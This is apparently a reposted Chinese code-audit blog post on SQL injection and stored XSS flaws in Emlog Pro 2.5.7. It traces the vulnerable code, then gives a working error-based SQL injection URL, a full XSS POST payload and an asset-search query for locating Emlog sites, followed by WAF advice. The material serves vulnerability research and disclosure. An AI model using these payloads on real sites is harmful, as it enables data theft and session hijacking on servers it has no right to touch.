|
声明:本文提供的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。 |
App="EMLOG"&&is_domain=true&&country="CN"一、SQL注入漏洞分析过程
1、首先打开emlog_pro_2.5.7adminmedia.php文件,$keyword参数由此传入。在media.php中,keyword参数通过Input::getStrVar('keyword')获取。
如下图:
2、接着,这个参数被传递到Media_Model的getMedias和getMediaCount方法中如下图
4、这里明显没有对$keyword进行任何过滤或转义处理,直接将其插入到SQL语句中。
2、跟进extractHtmlData方法未作相关过滤
3、接着$excerpt,赋值给$logData
4、最后在articel_save.php文件,第89行通过doMultiAction保存
5、跟进doMultiAction,通过钩子直接保存数据
Apache.2.4.39
MySql5.7.26
Php5.6.9
安装:先在msyql创建emlog数据库再访问web安装即可
1、sql注入验证:
http://127.0.0.1:8099/index.php?keyword=%2527%20AND%20updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)%20%20--%2520
2、xss验证:
POST /emlog_pro_2.5.7/admin/article_save.php HTTP/1.1Host: 192.168.17.103Content-Length: 1796Cache-Control: max-age=0Origin: http://192.168.17.103Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7dLxxHHoddxnJMVBUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://192.168.17.103/emlog_pro_2.5.7/admin/article.php?action=edit&gid=2Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1744352762; tw_comment_author=1; tk_ai=1%2BA2fri83NiO%2FIPjMIdteEBR; PHPSESSID=24fggvmjq26us7riv236npp743; EM_AUTHCOOKIE_O5MScKeTFAaXFCEtXoNG5gLYyH9s5X4Y=admin%7C0%7Cd6687300a74ea0f8afb2e7164704c7cb; em_saveLastTime=1745478698706Connection: keep-alive------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="title"111------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="logcontent"body"><img src="xss" onerror="alert(/111111111111111/)">------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="logexcerpt"1111------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="ishide"n------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="as_logid"2------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="gid"2------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="author"1------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="cover"------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="upload_img"; filename=""Content-Type: application/octet-stream------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="sort"-1------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="tag"------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="postdate"2025-04-24 14:37:07------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="allow_remark"y------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="alias"------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="link"------WebKitFormBoundary7dLxxHHoddxnJMVBContent-Disposition: form-data; name="password"------WebKitFormBoundary7dLxxHHoddxnJMVB--
5. nuclei检测脚本:
建议使用专门的 Web 应用程序防火墙(WAF)来检测和防止 SQL 注入攻击。WAF 可以提供更强大的安全性,包括自定义规则、恶意模式检测和更高级的防护。
nuclei检测
公众号回复Emlog获取检测脚本和源代码
最后
原文始发于微信公众号(实战安全研究):【代码审计】Emlog存在SQL注入+XSS漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论